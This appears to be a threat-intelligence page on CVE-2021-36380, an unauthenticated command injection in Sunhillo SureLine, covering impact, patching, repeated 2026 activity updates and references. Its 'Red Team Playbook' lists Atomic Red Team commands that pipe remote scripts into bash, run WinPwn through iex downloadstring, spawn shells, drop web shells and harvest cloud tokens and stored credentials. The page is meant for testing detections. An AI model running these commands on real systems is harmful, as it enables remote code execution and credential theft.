CVE-2021-36380
Overview
This vulnerability is an unauthenticated OS command injection caused by improper input validation of shell metacharacters in specific parameters. The affected component is the network diagnostic CGI script (/cgi/networkDiag.cgi) in Sunhillo SureLine firmware versions prior to 8.7.0.1.1. The flaw arises because user-supplied input in the ipAddr or dnsAddr parameters is directly passed to a shell command without sanitization, enabling injection of arbitrary commands.
Vulnerability Description
Sunhillo SureLine before 8.7.0.1.1 allows Unauthenticated OS Command Injection via shell metacharacters in ipAddr or dnsAddr /cgi/networkDiag.cgi.
Impact
An unauthenticated attacker can execute arbitrary operating system commands on the affected device remotely by exploiting this vulnerability. This allows full control over the system, including the ability to manipulate data, disrupt services, or pivot within the network. No authentication or user interaction is required, which significantly lowers the barrier for exploitation. The impact includes potential full system compromise and disruption of critical network diagnostic functionality.
Solution
Sunhillo has released a firmware update addressing this vulnerability in SureLine version 8.7.0.1.1. Users should upgrade to this version or later to remediate the issue. Detailed patch instructions and advisories are available on the vendor’s official product page at https://www.sunhillo.com/product/sureline/. No alternative workarounds are documented, so applying the official update is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Sunhillo SureLine versions prior to 8.7.0.1.1 is characterized by an unauthenticated OS command injection flaw that arises from improper handling of user input in the network diagnostic CGI script. Specifically, the vulnerability allows an attacker to inject shell metacharacters through the parameters ipAddr or dnsAddr. This oversight in input validation enables the execution of arbitrary commands on the underlying operating system, which can lead to a complete compromise of the affected system. The severity of this flaw is underscored by its high CVSS score of 9.8, indicating critical risk levels associated with potential exploitation.
Attack vectors for this vulnerability are particularly concerning due to the lack of authentication requirements. An attacker can exploit the flaw remotely by crafting a malicious request to the network diagnostic CGI endpoint. By manipulating the input parameters, an attacker can execute arbitrary commands with the privileges of the web server process. Scenarios may include retrieving sensitive information, altering system configurations, or even deploying malware. The ease of exploitation, combined with the ability to execute commands without authentication, poses a significant threat to organizations utilizing this product.
The real-world impact of this vulnerability can be profound, particularly for organizations that rely on Sunhillo SureLine for critical network operations. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential damage to the organization’s reputation. The business risks associated with such an incident include financial losses from operational downtime, regulatory penalties for data breaches, and the costs related to incident response and remediation efforts. Furthermore, the potential for lateral movement within the network could expose additional systems to compromise, amplifying the overall risk.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security strategy. Regular vulnerability assessments and penetration testing can help identify unpatched systems and weaknesses in the network. Intrusion detection systems (IDS) should be configured to monitor for unusual traffic patterns or suspicious requests targeting the CGI scripts. Additionally, organizations should prioritize applying security patches and updates to the affected product as soon as they become available. Implementing web application firewalls (WAF) can also provide an additional layer of defense by filtering and monitoring HTTP requests to block malicious input.
In conclusion, the unauthenticated OS command injection vulnerability in Sunhillo SureLine presents a critical risk that organizations must address promptly. The combination of easy exploitation and significant potential impact necessitates a proactive approach to security. By adopting robust detection and mitigation strategies, organizations can safeguard their systems against this and similar vulnerabilities, thereby enhancing their overall cybersecurity posture.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2021-36380, reflecting a significant uptick in attempts to exploit the unauthenticated OS command injection vulnerability in Sunhillo SureLine devices. Although no new exploit variants or ransomware affiliations have emerged, the sharp increase in telemetry signals heightened adversary interest and potential reconnaissance or attack campaigns targeting this critical flaw. This surge underscores the vulnerability’s persistent attractiveness to threat actors, likely due to its ease of exploitation and the broad impact on affected systems. Consequently, the risk posture associated with CVE-2021-36380 has intensified, warranting increased vigilance from defenders as the probability of successful exploitation grows in operational environments.
Update 2 — May 23, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2021-36380, with our telemetry indicating a sustained increase in attempts to exploit this vulnerability. While no new exploit variants or ransomware affiliations have been identified, the persistence and growth in detection signals suggest adversaries continue to prioritize this flaw for reconnaissance and potential intrusion efforts. This heightened activity reflects the vulnerability’s ongoing appeal due to its unauthenticated command injection vector, which remains a straightforward attack surface in affected Sunhillo SureLine deployments. Consequently, the threat level has risen from elevated to critical, as the probability of successful exploitation in operational environments has increased, demanding heightened situational awareness from defenders monitoring network diagnostics interfaces.
Update 3 — June 07, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2021-36380, indicating that adversaries are increasingly targeting the unauthenticated OS command injection vulnerability in Sunhillo SureLine devices. This surge in telemetry suggests a growing operational interest, potentially reflecting expanded reconnaissance or initial intrusion attempts leveraging the vulnerable /cgi/networkDiag.cgi interface. Although no new exploit variants or ransomware affiliations have been observed, the persistence and amplification of attack signals underscore the vulnerability’s continued attractiveness as an attack vector. Consequently, the threat level associated with CVE-2021-36380 has been elevated further, reinforcing the criticality of this flaw within the current threat landscape and emphasizing the need for vigilant monitoring of network diagnostic endpoints in affected environments.
Update 4 — July 05, 2026
CSURFACE threat intelligence has identified a marked escalation in activity targeting the CVE-2021-36380 vulnerability, with our telemetry indicating a clear upward trend in exploitation attempts against the Sunhillo SureLine network diagnostic interface. This intensification suggests adversaries are increasingly prioritizing this vector, likely due to its high severity and potential for unauthenticated command injection. Although no novel exploit variants or ransomware affiliations have surfaced, the sustained increase in probing and exploitation signals elevates the operational risk for affected environments. Defenders should recognize that the vulnerability remains a highly attractive target for initial access or lateral movement, underscoring the critical need for continuous monitoring. Consequently, the threat level associated with CVE-2021-36380 has been reassessed as more pronounced, reflecting its persistent exploitation momentum within the current threat landscape.
Update 5 — July 14, 2026
CSURFACE threat intelligence has identified a slight increase in probing activity targeting the Sunhillo SureLine vulnerability CVE-2021-36380. While the overall exploit landscape remains unchanged with no new exploit variants or ransomware group affiliations detected, our telemetry indicates a modest uptick in unauthenticated command injection attempts via the vulnerable network diagnostic interface. This subtle rise in adversary interest signals that threat actors continue to prioritize this critical vulnerability as a viable vector for initial access or lateral movement within compromised environments. Although the probability of exploitation has not dramatically shifted, the persistence of scanning and exploitation attempts underscores the necessity for defenders to maintain heightened vigilance. Consequently, the risk assessment for CVE-2021-36380 has been adjusted to reflect a sustained, if moderate, exploitation momentum that keeps this vulnerability at a critical threat level within the current operational environment.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sunhillo | Sureline | All |
cpe:2.3:a:sunhillo:sureline:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
31 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
47%
|
High | High | |
| CAPEC-6 | Argument Injection |
46%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-36380 |
| sunhillo.com |
GitHub CVE
x_refsource_MISC
|
https://www.sunhillo.com/product/sureline/ |
| research.nccgroup.com |
GitHub CVE
x_refsource_MISC
|
https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-36380 |